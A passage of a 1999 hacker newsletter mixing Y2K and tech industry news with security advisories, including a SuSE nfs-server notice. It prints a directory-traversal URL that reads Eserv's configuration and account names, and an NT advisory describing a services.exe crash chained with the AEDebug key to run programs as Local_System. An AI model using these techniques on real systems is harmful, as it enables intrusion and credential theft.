Microsoft clearly owns the desktop, because if you go to
CompUSA, all the shelves have software for Windows.
�We are very actively focused on this problem, and we
are very happy with what folks like Corel are doing,
bringing over their office (software) suite, with what Sun
Microsystems has done with Star Office, with what
Applixware is doing with their suite. We�re happy with
what Netscape/AOL has been doing with the browser,
because the browser was the killer desktop application in
the 1990s.�
Red Hat, the leading Linux seller, announced Monday
that it will acquire software company Cygnus Solutions for
$674 million. Young says this deal will also help.
�Cygnus makes the kind of tools that developers need
to create the applications people want,� Young says.
�This could go a long way to help provide this total
solution that people need to do the kind of things they
really want to on the desktop.�
@HWA
58.0 2K PREPARATIONS CAUSED PROBLEMS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 6:00 pm CET
Y2K problems are starting before the actual rollover. Attempts by
the City of Montreal to stave off a Y2K computer disaster are being
blamed for causing the blaze that gutted a fire station.
Link: Canoe
http://www.canoe.ca/EdmontonNews/es.es-11-17-0047.html
(Bleh! - 404: url not found)
@HWA
59.0 IS MICROSOFT TO BLAME FOR Y2K?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 6:12 pm CET
David O'Daniel Eddy wrote his opinion on Microsoft, with the actual
quote that Microsoft could be called responsible for the Y2K
problem. Do read his article entitled "A Knuckleball for Microsoft".
Link: Westergaard
http://www.wbn.com/y2ktimebomb/Techcorner/DE/de9946.htm
A Knuckleball for Microsoft
� 1999 By David O'Daniel Eddy
November 17, 1999
Now that we have something really serious -- the Justice
Department's ruling that Microsoft is a predatory
monopoly -- to distract us, provide a wonderful
amorphous target for endless editorial speculation, and
generally contribute to landfills, I'd better get my two cents
on the table.
A year ago I expressed my reservations about how Microsoft's plunging
ahead with Windows 2000 was an indication of their not paying serious
attention to Y2K issues on the desktop.
Although I recognize that Microsoft has indeed done tremendous good
for the PC industry, they are at the same time far too full of their own
power and success. They're so powerful now that they are effectively a
captive of their own PR spin. If Chairman Bill says Y2K is primarily an
old mainframe issue, then that's the way it is. End of discussion.
But reality says something different.
Let me share one of my favorite little factoids. My local business library
has a directory of desktop (Windows, Unix, Macintosh, Commodore,
Amiga, Tandy, etc.) software. It lists 3,056 vendors and 21,000
products. The majority of these commercial software products are what
I would broadly classify as accounting packages -- accounts receivable,
accounts payable, inventory management, general ledger, etc. The stuff
that runs businesses.
I don't care how you slice this, that's a lot of software. And we haven't
even looked at the issue of how many different releases or versions of
a product are available. Just because a vendor is at v10 of their
product is not to say that all v1 versions have been retired in their
customer base.
Then I factor in knowledge from the outside world and my Y2K travels.
The directory really tracks software packages offered only for broad
market sale. It does not include the "package" written by a local CPA
firm and installed (in a variety of configurations!) at 25 local client sites.
The directory obviously doesn't include products that are no longer sold.
It doesn't include the entirely custom software that has been written in
the dozens of PC database/language products such as dBase II,
dBase III, dBase IV, FoxPro, Paradox, 4D, Revelation, Alpha Four,
FileMaker, and Clipper.
In our fascination with the spectacular rise of Microsoft's market
success we seem to forget that they make only software tools. They do
not make core business accounting packages. They do not make
business applications. That market is serviced by products from the
likes of PeachTree, Great Plains Software, and thousands of other
vendors. There are no dominant players here. In the world of desktop
accounting packages, to have $50 million in revenues is to be large.
The point I'm trying to drive home here is that our perceptions are
upside down. Microsoft makes the base layer of operating system
software and some of the specialized tools (database engines and
language compilers) from which business applications are constructed.
It's the teeny tiny (by comparison to the Microsoft behemoth) accounting
package vendors like Great Plains Software ($85 million 1998
revenues) that use Microsoft hammers to build houses that people
actually live in.
As powerful, useful, and ubiquitous as MS Word and Excel have
become, we have to remember that these are only the equivalent of a
hammer or screwdriver. As universal as these products have become,
it is simply not possible to run a business of any size or complexity with
just a word processor and spreadsheet. To be a business, you need a
chart of accounts, a general ledger, double entry bookkeeping,
inventory control and much, much more.
We've become so dazzled by Microsoft's ability to tell us it's time once
again to upgrade to a more powerful operating system that we've lost
sight of the fact that there are still tens of thousands of business
applications in active use in both large and small enterprises, which are
still running MS-DOS v5 on a 286 PC. There are huge segments of the
marketplace that simply don't pay attention to the endless upgrade
treadmill foisted on us by Microsoft and the media.
And because Microsoft took an early hard line on Y2K -- "that's a
mainframe problem" -- from the beginning, large numbers of people,
assuming that a smart, super rich guy like Bill Gates knows what he's
talking about, have simply gone back to sleep about the Y2K risks
lurking inside their business operations.
The tide of public opinion, represented in one aspect by the court's
monopoly ruling, is beginning to shift against Microsoft. When core
business applications running on defined-as-obsolete software (e.g.,
running on MS-DOS or Windows 3.1) goes belly up in the new year,
there are going to be a lot of very angry folks. These are business
people who are not at all interested in an esoteric technical discussion
about the differences between operating system tools and business
applications. After all, the cynics said all along that Y2K was just a
scam and that Gates & Co. would ride in at the last moment with a
$49.95 fix-it special.
The evidence is that many small businesses do not perceive
themselves to be at risk and are planning to cope with Y2K in a
"fix-on-failure" mode.
I believe that the building resentment against Microsoft's abusive
tactics and undisputed monopoly powers will take an additional swing
into negative territory come the new year, when core PC applications
start going flakey.
It certainly doesn't make sense to hold the tool builder responsible for
the fact that your house collapsed, but the tool builder -- Microsoft in this
instance -- has set themselves up for a mighty fall by turning a largely
deaf ear to desktop Y2K risks.
@HWA
60.0 $50 MILLIONS FOR Y2K CENTER
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 4:57 pm CET
The government offered the first public glimpse Monday of its new
$50 million Y2K nerve center, a highly computerized crisis room
near the White House designed to track failures worldwide caused
by the Year 2000 technology problem.
Link: SJ Mercury
http://www.sjmercury.com/svtech/news/breaking/merc/docs/081106.htm
Government opens $50 million Y2K crisis center
WASHINGTON (AP) -- The government offered the first public glimpse Monday
of its new $50 million Y2K nerve center, a highly computerized crisis room
near the White House designed to track failures worldwide caused by the
Year 2000 technology problem.
President Clinton's top Y2K adviser, John Koskinen, said the
administration continues to believe there will be no major national
problems, but said its Information Coordination Center will watch for
``some glitches'' anticipated during the New Year's date rollover.
``We hope that night will be really boring,'' said Koskinen, standing
before a glass-empaneled room filled with high-end computers and digital
maps showing global time zones. He called it ``the one place in the world
with the most complete information.''
The government Monday also began cautioning against panic as people
discover problems during the New Year's weekend, since some non-Y2K
computer failures might simply coincide with the date rollover.
``We'll have failures from time to time whether you have a century date
change or not,'' said Skip Patterson, who runs the Year 2000 program for
Bell Atlantic Corp. Experts have previously warned of widespread phone
outages if everyone tried to make a call around midnight -- what Koskinen
described as ``Mother's Day by multiples.''
Nationwide almost every day, for example, some Internet sites crash,
electricity temporarily fails or airline flights are delayed. In the
earliest hours of Jan. 1, no one may know whether problems were caused by
the Y2K bug or something else.
``The presumption is to blame all failures on Y2K that weekend,'' Koskinen
said.
About 10 percent of all credit transactions fail routinely because, for
example, equipment breaks down or because consumers are overextended or
forget their ATM password, said Paul Schmelzer, an executive vice
president for Orlando, Fla.-based Star Systems Inc., which process about 2
billion financial transactions annually.
He expects those same problems to show up Jan. 1.
``What consumers need to do if they go to an ATM on New Year's Day and
find for whatever reason they can't get service, they should do what they
do today -- go find a machine down the block or get cash back in the
grocery store,'' Schmelzer said. ``Let's don't immediately assume we've
got some serious Y2K problems.''
The government's Y2K crisis center is hardly a bunker -- it's on the 10th
floor of a downtown building just blocks from the White House -- but it
includes backup communications systems and entrance guards.
Reports of any problems -- rated ``minor'' or ``significant'' -- will be
shared with the White House and top government officials who will decide
what to do. Information overseas will be fed by the State and Defense
departments and industry groups, starting at roughly 6 a.m. EST Dec. 31,
when midnight falls worldwide first in New Zealand.
A flurry of activity is expected as midnight arrives across U.S. time
zones, with more attention starting midday EST Jan. 2 as employees
worldwide begin returning to their offices -- and turning on their
computers -- for the first time since the date change.
Koskinen predicted that any hacker attacks could be more easily detected
during the date rollover because computers will be so closely monitored.
A hacker calling himself ``Comdext0r'' vandalized a Web site at the
Commerce Department late Sunday, warning people to ``run for your lives!''
and to ``hit your computer's power button and never, ever turn it on
again'' because of the Y2K bug.
A spokesman for the National Telecommunications and Information
Administration, the government agency that handles high-tech policies,
said its Internet site was altered about 9 p.m. Sunday but repaired about
one hour later.
Koskinen noted that recreational hackers typically vandalize Web sites to
demonstrate some vulnerability that a computer administrator failed to
fix. He said he was hopeful hackers wouldn't try such demonstrations
during the weekend date change.
``We think they will understand this is not the best time to do that,''
Koskinen said.
@HWA
61.0 EYES ON EXEC 2.32
~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 4:44 pm CET
Eyes on Exec 2.32 is a set of tools which you can use to build your
own host based IDS. It watches for programs getting exec'd and
logs information about it to a file. Combined with perl this can be
extremely powerful. Requires linux kernel 2.2.
Link: Packet Storm
http://packetstorm.securify.com/UNIX/IDS/eoe232.tar.gz
@HWA
62.0 CHECKPOINT AND LINUX
~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 4:37 pm CET
Check Point Software Technologies' has created versions of its
virtual private networks (VPN) and its security solution for the Linux
platform to help Linux users keep prying eyes on the Internet at bay.
Link: Checkpoint
http://www.checkpoint.com
@HWA
63.0 NOVELL SIMPLIFIES THINGS
~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 4:33 pm CET
Novell's chief executive Eric Schmidt yesterday announced an
update to Novell's directory software that's intended to simplify the
Web experience. A directory serves as a central repository for
information concerning users, systems and network devices.
Link: CNET
http://news.cnet.com/news/0-1003-200-1451504.html?dtn.head
Novell update intended to simplify Web logins, networks
By Wylie Wong
Staff Writer, CNET News.com
November 16, 1999, 9:15 p.m. PT
scomdex LAS VEGAS--Novell aims to untangle the Web, according to chief
executive Eric Schmidt.
Speaking at a trade show here, Schmidt today announced an update to
Novell's directory software that's intended to simplify the Web
experience. A directory serves as a central repository for information
concerning users, systems and network devices.
The constant pitfalls of surfing are all too familiar, Schmidt said.
Consumers face the hassle of trying to remember login names and passwords,
while businesses find it difficult to link their employees, suppliers and
partners together and manage those relationships. Novell hopes networks
will adopt its technology with the goal of making it easier to store and
retrieve that information.
Novell, once struggling in the shadow of Microsoft, is attempting to make
a comeback with its directory software technology as a strategic
centerpiece. The company believes its directory can become a central
information database for software developers to rely on.
Schmidt demonstrated how the technology works during his speech: With the
update, the company's previously announced DigitalMe service allows Web
portals, e-commerce firms and Internet service providers to let consumers
control how their personal information is shared, used and maintained on
the Net via a link to Novell's directory, or NDS.
"It's the holy grail that the networking CIO [chief information officer]
is trying to achieve," Schmidt said.
In addition to the Internet-based directory update, called eDirectory,
Novell released its NDS corporate edition for managing user information.
The company also announced Net Publisher, which helps businesses manage
the publication of content over the Web.
The eDirectory--based on previously released NDS version 8
technology--supports the NetWare, Microsoft Windows NT and Sun
Microsystems Solaris operating systems. In the future, the directory also
will support Linux, Compaq Tru64 and Windows 2000, the company said.
The release of eDirectory will lead to several product introductions over
the next several months, according to Schmidt.
Novell further announced two dozen partnerships, including AltaVista,
BroadVision, Sun Microsystems, PeopleSoft and Oblix, which are either
using the technology in their businesses are building the technology into
their products. Novell wants to encourage corporations to rely on its
directory, so that businesses come to use its central administrative
database regardless of the operating system they are using.
"It's key to manage the information of users, to authenticate users on
what kinds of information they have access to, and to provide single
administration," said Eric Golin, chief technology officer of Broadvision,
during a press conference today.
Novell executives are launching several promotions to market eDirectory.
Independent software vendors can download a 100-user version of eDirectory
and bundle it in its own applications.
@HWA
64.0 RPC.NFSD PROBLEMS
~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 4:27 pm CET
The rpc.nfsd which is part of the nfs-server package was found to
have two remote vulnerabilities.
Link: Packet Storm
http://packetstorm.securify.com/advisories/suse/suse.nfs.txt
-----BEGIN PGP SIGNED MESSAGE-----
______________________________________________________________________________
SuSE Security Announcement
Package: nfs-server < 2.2beta47 within nkita
Date: Fri, 12 Nov 1999 02:12:50 GMT
Affected SuSE versions: all
Vulnerability Type: remote root compromise
SuSE default package: yes (not activated by default)
Other affected systems: all linux systems using the nfs-server
______________________________________________________________________________
A security hole was discovered in the package mentioned above.
Please update as soon as possible or disable the service if you are using
this software on your SuSE Linux installation(s).
Other Linux distributions or operating systems might be affected as
well, please contact your vendor for information about this issue.
Please note, that that we provide this information on "as-is" basis only.
There is no warranty whatsoever and no liability for any direct, indirect or
incidental damage arising from this information or the installation of
the update package.
_____________________________________________________________________________
1. Problem Description
The rpc.nfsd which is part of the nfs-server package was found to have
two remote vulnerabilities.
2. Impact
Via a buffer overflow, remote root access can be achieved. Write access to
the local filesystem which is exported is necessary.
Another security problem are improper root_sqash export handlings.
3. Solution
Updated the package from our FTP server.
______________________________________________________________________________
Please verify these md5 checksums of the updates before installing:
f03592bc738b6fa5cfa2f3a21250125a ftp://ftp.suse.com/pub/suse/axp/update/6.1/a1/nkita-99.11.11-0.alpha.rpm
c4fd6ad2029165a14e26140c56c64a06 ftp://ftp.suse.com/pub/suse/i386/update/6.1/a1/nkita-99.11.11-0.i386.rpm
75c7b4aa20d13f4b81428013690fbf3f ftp://ftp.suse.com/pub/suse/i386/update/6.2/a1/nkita-99.11.11-0.i386.rpm
______________________________________________________________________________
You can find updates on our ftp-Server:
ftp://ftp.suse.com/pub/suse/i386/update for Intel processors
ftp://ftp.suse.com/pub/suse/axp/update for Alpha processors
or try the following web pages for a list of mirrors:
http://www.suse.de/ftp.html
http://www.suse.com/ftp_new.html
Our webpage for patches:
http://www.suse.de/patches/index.html
Our webpage for security announcements:
http://www.suse.de/security
If you want to report vulnerabilities, please contact
security@suse.de
______________________________________________________________________________
SuSE has got two free security mailing list services to which any
interested party may subscribe:
suse-security@suse.com - moderated and for general/linux/SuSE
security discussions. All SuSE security
announcements are send to this list.
suse-security-announce@suse.com - SuSE's announce-only mailing list.
Only SuSE's security annoucements are sent
to this list.
To subscribe to the list, send a message to:
<suse-security-subscribe@suse.com>
To remove your address from the list, send a message to:
<suse-security-unsubscribe@suse.com>
Send mail to the following for info and FAQ for this list:
<suse-security-info@suse.com>
<suse-security-faq@suse.com>
_____________________________________________________________________________
This information is provided freely to everyone interested and may
be redistributed provided that it is not altered in any way.
Type Bits/KeyID Date User ID
pub 2048/3D25D3D9 1999/03/06 SuSE Security Team <security@suse.de>
- ------BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
mQENAzbhLQQAAAEIAKAkXHe0lWRBXLpn38hMHy03F0I4Sszmoc8aaKJrhfhyMlOA
BqvklPLE2f9UrI4Xc860gH79ZREwAgPt0pi6+SleNFLNcNFAuuHMLQOOsaMFatbz
JR9i4m/lf6q929YROu5zB48rBAlcfTm+IBbijaEdnqpwGib45wE/Cfy6FAttBHQh
1Kp+r/jPbf1mYAvljUfHKuvbg8t2EIQz/5yGp+n5trn9pElfQO2cRBq8LFpf1l+U
P7EKjFmlOq+Gs/fF98/dP3DfniSd78LQPq5vp8RL8nr/o2i7jkAQ33m4f1wOBWd+
cZovrKXYlXiR+Bf7m2hpZo+/sAzhd7LmAD0l09kABRG0JVN1U0UgU2VjdXJpdHkg
VGVhbSA8c2VjdXJpdHlAc3VzZS5kZT6JARUDBRA24S1H5Fiyh7HKPEUBAVcOB/9b
yHYji1/+4Xc2GhvXK0FSJN0MGgeXgW47yxDL7gmR4mNgjlIOUHZj0PEpVjWepOJ7
tQS3L9oP6cpj1Fj/XxuLbkp5VCQ61hpt54coQAvYrnT9rtWEGN+xmwejT1WmYmDJ
xG+EGBXKr+XP69oIUl1E2JO3rXeklulgjqRKos4cdXKgyjWZ7CP9V9daRXDtje63
Om8gwSdU/nCvhdRIWp/Vwbf7Ia8iZr9OJ5YuQl0DBG4qmGDDrvImgPAFkYFzwlqo
choXFQ9y0YVCV41DnR+GYhwl2qBd81T8aXhihEGPIgaw3g8gd8B5o6mPVgl+nJqI
BkEYGBusiag2pS6qwznZiQEVAwUQNuEtBHey5gA9JdPZAQFtOAf+KVh939b0J94u
v/kpg4xs1LthlhquhbHcKNoVTNspugiC3qMPyvSX4XcBr2PC0cVkS4Z9PY9iCfT+
x9WM96g39dAF+le2CCx7XISk9XXJ4ApEy5g4AuK7NYgAJd39PPbERgWnxjxir9g0
Ix30dS30bW39D+3NPU5Ho9TD/B7UDFvYT5AWHl3MGwo3a1RhTs6sfgL7yQ3U+mvq
MkTExZb5mfN1FeaYKMopoI4VpzNVeGxQWIz67VjJHVyUlF20ekOz4kWVgsxkc8G2
saqZd6yv2EwqYTi8BDAduweP33KrQc4KDDommQNDOXxaKOeCoESIdM4p7Esdjq1o
L0oixF12Cg==
=pIeS
- ------END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
iQEVAwUBOCxSlney5gA9JdPZAQEUbgf/ZhcxgxXlrIcEZnFEtiWsRqrr6qRB9jyD
uV4SqRTUa6ywdO9ZWsQIAvHXI2siTaUea99CJFkDxmNIWgz9Zg2WtiUa4nvKscQv
jWV7yBxBvnpZVkFfZmm7X9Lo3vQgf3+6uocy+NAoiKsLWISazUY7rdahxgE3gEAY
qFN3cP9B2ABtrTuLcUbaGWy57MDuQHEC1MiMv71UtkGSkX12OtMfrSIG5IXTdbjs
wIkMj0KKtJNk2W4mWgUk1U2twWXb8ZVzRJwaP1XY2S/yjF898X9FcM6AzQBdBT/3
QVQ1viXvAhvI0k7Cxy6+QALieShi4cIWn8jK6+0S+2wFODohnakC/g==
=rVGR
-----END PGP SIGNATURE-----
@HWA
65.0 Eserv 2.50 Web interface Server Directory Traversal Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://packetstorm.securify.com/
From owner-news@technotronic.com Thu Nov 4 22:28:55 1999
Return-Path: <owner-news@technotronic.com>
Received: from sword.damocles.com([209.100.46.1]) (3359 bytes) by packetstorm.securify.com
via sendmail with P:esmtp/D:user/T:local
(sender: <owner-news@technotronic.com>)
id <m11jcrl-0006CKb@packetstorm.securify.com>
for <packet@packetstorm.securify.com>; Thu, 4 Nov 1999 22:28:53 -0800 (PST)
(Smail-3.2.0.106 1999-Mar-31 #1 built 1999-Sep-18)
Received: (from technomail@localhost)
by sword.damocles.com (8.9.1a/8.9.1) id UAA16404
for news-resend-technotroniccom; Thu, 4 Nov 1999 20:42:27 -0600
X-Authentication-Warning: sword.damocles.com: technomail set sender to owner-news@technotronic.com using -f
Received: from sword.damocles.com (vacuum@sword.damocles.com [209.100.46.1])
by sword.damocles.com (8.9.1a/8.9.1) with SMTP id UAA16399
for <news@technotronic.com>; Thu, 4 Nov 1999 20:42:25 -0600
Date: Thu, 4 Nov 1999 20:42:25 -0600 (CST)
From: Vacuum <vacuum@technotronic.com>
X-Sender: vacuum@sword.damocles.com
To: news@technotronic.com
Subject: Eserv 2.50 Web interface Server Directory Traversal Vulnerability
Message-ID: <Pine.LNX.3.96.991104203908.16094A-100000@sword.damocles.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-news@technotronic.com
Precedence: bulk
Status: RO
---------- Forwarded message ----------
Date: Thu, 4 Nov 1999 18:26:52 -0600
From: owner-news@technotronic.com
To: owner-news@technotronic.com
Subject: BOUNCE news@technotronic.com: Approval required:
>From vacuum@sword.damocles.com Thu Nov 4 18:26:51 1999
Received: from ussrback.com (jupiter.hosting4u.net [209.15.2.9])
by sword.damocles.com (8.9.1a/8.9.1) with SMTP id SAA05681
for <news@technotronic.com>; Thu, 4 Nov 1999 18:26:46 -0600
Received: from luck ([200.41.64.206]) by ussrback.com ; Fri, 05 Nov 1999 00:26:32 -0600
From: "Ussr Labs" <labs@ussrback.com>
To: "TECHNOTRONIC" <news@technotronic.com>
Subject: Eserv 2.50 Web interface Server Directory Traversal Vulnerability
Date: Thu, 4 Nov 1999 21:20:35 -0300
Message-ID: <NCBBKFKDOLAGKIAPMILPIEINCAAA.labs@ussrback.com>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200
Eserv 2.50 Web interface Server Directory Traversal Vulnerability
Product:
Eserv/2.50 is the complete solution to access Internet from LAN:
- Mail Server (SMTP and POP3, with ability to share one mailbox
on the ISP, aliases and mail routing support)
- News Server (NNTP)
- Web Server (with CGI, virtual hosts, virtual directory support,
web-interface for all servers in the package)
- FTP Server (with virtual directory support)
- Proxy Servers
* FTP proxy and HTTP caching proxy
* FTP gate
* HTTPS proxy
* Socks5, Socks4 and 4a proxy
* TCP and UDP port mapping
* DNS proxy
- Finger Server
- Built-in scheduler and dialer (dial on demand,
dialer server for extern agents, scheduler for any tasks)
PROBLEM
UssrLabs found a Eserv Web Server Directory Traversal Vulnerability
Using the string '../' in a URL, an attacker can gain read access to
any file outside of the intended web-published filesystem directory
There is not much to expand on this one....
Example:
http://127.1:3128/../../../conf/Eserv.ini to show all configuration file
including
account names
Vendor Status:
no contacted
Vendor Url: http://www.eserv.ru/
Program Url: http://www.eserv.ru/eserv/
Credit: USSRLABS
SOLUTION
Nothing yet.
@HWA
66.0 RFP9906 - RFPoison
~~~~~~~~~~~~~~~~~~
From rfp@wiretrip.net Mon Nov 1 09:20:06 1999
Date: Mon, 1 Nov 1999 08:18:50 -0600 (EST)
From: ".rain.forest.puppy." <rfp@wiretrip.net>
To: vacuum@technotronic.com, thegnome@nmrc.org
Subject: RFP9906 - RFPoison
--- Advisory RFP9906 ----------------------------- rfp.labs -----------
Windows NT remote denial of service and compromise
(RFPoison)
------------------------------ rain forest puppy / rfp@wiretrip.net ---
Table of contents:
- 1. Problem
- 2. Solution
- 3. Where to Get This Weapon of Mass Destruction
- 4. Miscellanous Updates (Important stuff!)
-----------------------------------------------------------------------
My website has been launched! Up to the minute advisories, tools, (and
code fixes...heh) are available from http://www.wiretrip.net/rfp/
-----------------------------------------------------------------------
----[ 1. Problem
Interesting on how things go around/come around. Recently Luke
Kenneth Casson Leighton posted a message on NTBugtraq in response to SP6
not fixing the LSA denial of service. He states that this problem is
essentially "due to marshalling/unmarshalling MSRPC code being unable to
cope with a NULL policy handle." He also states that they reported this
problem to Microsoft around February 1999.
Well, no, I did not 'rediscover' the LSA denial of service (ala
the AEDebug advisory earlier this month). I did, however, discover a
different denial of service based out of services.exe. When sent a
specific packet, it's possible to get srvsvc.dll to choke, and cause
services.exe to reference a bad memory location. For those geeks in the
crowd, essentially srvsvc_netrshareenum in srvsvc.dll uses
rpcrt4_ndrcomplexstructunmarshall to tweak a string, but returns a NULL.
srvsvc_netrshareenum doesn't check for return value, adds four to the
pointer, and passes it up a function stack until finally that memory is
read (address 00000004). Blam...Dr. Watson.
So we have another problem due to marshalling/unmarshalling MSRPC
code. This was found independantly of Luke's info and the LSA
vulnerability.
The impact is pretty severe. Services.exe handles named pipes for
the system. Once this crashes, everything named-pipe-based goes with it.
This means logons, logouts, remote system access (registry, server
functions, etc), local server management, IIS, file sharing, etc...all go
down the tube. However, the box will, for the most part, appear to
function normally on the local side, until you do something involving a
named pipe service. The only fix is to reboot...however, the shutdown
procedure waits for every (non-existant) service to respond to shutdown,
and timeout. On a typical box this could cause the full shutdown
procedure to push over a half-hour; therefore, hard reset is most likely
needed. Also, once in a great while the bug will 'survive' during a
reset. It may take two reboots to get the system back in order. Strange,
yes. How, I'm not sure. But it's happened over a half dozen times across
four separate boxes I've tested on.
Now, I'm sure some of you are thinking "well, denial of services
suck. How can I own .gov and .mil websites with this?" (hi flipz and
fuqrag)
Well, let's go back to David LeBlanc's response to RFP9903
(AEDebug advisory). He states, for AEDebug to really be a problem, you
have to "make something crash that has higher access rights than you do."
He also states "you've got to make a service go down that won't kill the
machine."
Bingo, this fits the bill. If we have access to change the
AEDebug registry key, we can set what programs to run on crash, set
autorun to True, and then crash services.exe. Our programs run as
Local_System, the box is still alive (TCP/IP-wise) and usable via netcat
and whatnot. A much more useful situation for a denial of service, don't
you think?
Also, Eric Schultze has detailed out many situations where someone
could have access to your AEDebug key. I suggest you read his tidbit.
It's posted as document 11 in the knowledge base on my website, available
at http://www.wiretrip.net/rfp/
So far, I have been able to use this exploit on NT 4.0 server and
workstation, with various levels of SP 1, 3, 5, and 6 service packs
installed. I even tried applying SP 5 with the following hotfixes (in the
following order): lsareq, ipsrfix, csrssfx, ioctlfx, and igmpfix. I've
also tried using the Security Configuration Editor on various different
'secure' system profiles, testing to see if perhaps a registry key
affected it. After all modifications, the systems were still susceptible.
HOWEVER, I do have reports of two boxes *NOT* being susceptible. The
reason for this, however, is unfound. Information will be released when
it is found. If you come across a situation where a box is impervious to
the exploit, PLEASE EMAIL ME. I would really appreciate the entire
install history of that particular system. Email to rfp@wiretrip.net.
----[ 2. Solution
Well, as previously stated, Luke and ISS informed Microsoft of the
LSA vulnerability in February 1999. To be fair, I also reported this
exact bug, along with the working exploit, to Microsoft on Oct 25th. Have
not hear a word. So, in the meantime, I can recommend two things:
- Block port 139 on your firewall. This, however, does not stop internal
attack.
- Turn off the Server service. While inconvenient, this should be deemed
as a temporary solution until Microsoft releases a patch. Just for
reference, shutting off the Server service will also shut down the
Computer Browser service. Glitch, a fellow Wiretrip member, describes the
functions of these services as follows:
SERVER: Used as the key to all server-side NetBIOS applications, this
service is somewhat needed. Without this service, some of the
administrative tools, such as Server Manager, could not be used. If remote
administration is not needed, I highly recommend disabling this service.
Contrary to popular belief, this service is NOT needed on a webserver.
COMPUTER BROWSER: The Computer Browser service is a function within
Microsoft networking for gathering and distributing resource information.
When active on a server, the server will register its name through a
NetBIOS broadcast or directly to a WINS server.
So you should note that turning these services off will disable the server
from participating in NetBIOS-related functions, including file sharing
and remote management. But realistically, how many servers need this?
Alternate means of content publishing (for webservers) exist (FTP and
-ugh- FrontPage). Of course this leaves the myriad of other services
though. I'd be interested to see how MS SQL fairs.
It's hoped that between the services.exe and the lsass.exe denial of
services, both based on bad RPC code, Microsoft will find this problem
worthy of fixing.
Now we wait...
----[ 3. Where to Get This Weapon of Mass Destruction
I use this title jokingly. But trust me, I have gone back and
forth about the release of this exploit. However, as a proponent of full
disclosure, I definately will release a working exploit. But I do so with
conditions:
- I will only release a Windows executable.
- The windows executable is coded to reboot (NT) or crash (9x) upon
successful execution. If you blow something up, you blow up too.
- A few checks that keep the program from running if you run in a user
context that does not allow the above 'safety features' to work.
But it is a working executable. I'm hoping this will at least curb the
script kiddie activity. Of course, I'm sure this program will be reversed
and a new version made within 6 hours of posting--but that's not my
problem. This should be more than enough to verify/test the exploit, and
I've provided the details of how it works and the solutions necessary for
stopping it. The skilled will be able to go off this, and the, well, the
abusers will hit the glass ceiling as intended. Thanks to Vacuum for
helping me come up with a responsible solution.
Also, I want to make it very clear, before I tell you where to get the
executable....
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
oh, and
DO NOT ASK ME FOR SOURCE.
I don't care who you are. All email asking for source will be instantly
deleted. I don't care if you send me the secret to life--if it has "p.s.
can I get the source?" I will pipe that thing to /dev/null, along with
whatever goodies you may have sent me. Don't even joke; you won't get a
reply.
Now that that's established, you can download RFPoison.exe from my
website (of course) at http://www.wiretrip.net/rfp/
----[ 4. Miscellaneous Updates (Important stuff!)
- whisker 1.2.0 has been released! Includes the ability to bounce scans
off of AltaVista (thanks to Philip Stoev) Plus some new feature additions,
and new scan scripts, including a comprehensive script for scanning
FrontPage (thanks to Sozni).
- flipz and fuqrag have been busy hacking .gov and .mil sites. Turns out
they're using a vanilla copy of msadc2.pl. Check out msadc2.pl (their
exploit) at my website.
- Zeus Technologies had an outstanding response to RFP9905. In under 12
hours they had a patched version available, and were all-around terrific in
their private and public response. As an indication of how they do
business, I would recommend Zeus Technologies as a vendor to anyone. Kudos
for them.
- technotronic and rfp.labs have teamed up! We're going to combine a couple
of resources--starting with the mailing list. Technotronic already puts out
some good info on his list...now I'll be giving the same list up to date
information on rfp.labs advisories, information, and other various cool
info. If you're not on it already, you may consider joining. Signup at
www.technotronic.com
- with the (sad?) end of octoberfest, I'm also pleased to see w00w00 take
over with 'w00giving'--all through the month of November w00w00 will be
releasing some more stuff! You can start looking for the first (of many)
advisories today (Nov 1st).
Special greetings to Simple Nomad (and others) on this special day where
the wheel finishes its cycle and starts its revolution anew.
--- rain forest puppy / rfp@wiretrip.net ----------- ADM / wiretrip ---
So what if I'm not elite. My mom says I'm special.
--- Advisory RFP9906 ----------------------------- rfp.labs -----------
@HWAA
-=----------=- -=----------=- -=----------=- -=----------=-
0
0
0
o
O O O
0
=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _ _ _
/\ | | | | (_) (_)
/ \ __| |_ _____ _ __| |_ _ ___ _ _ __ __ _
/ /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` |
/ ____ \ (_| |\ V / __/ | | |_| \__ \ | | | | (_| |
/_/ \_\__,_| \_/ \___|_| \__|_|___/_|_| |_|\__, |
__/ |
|___/
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
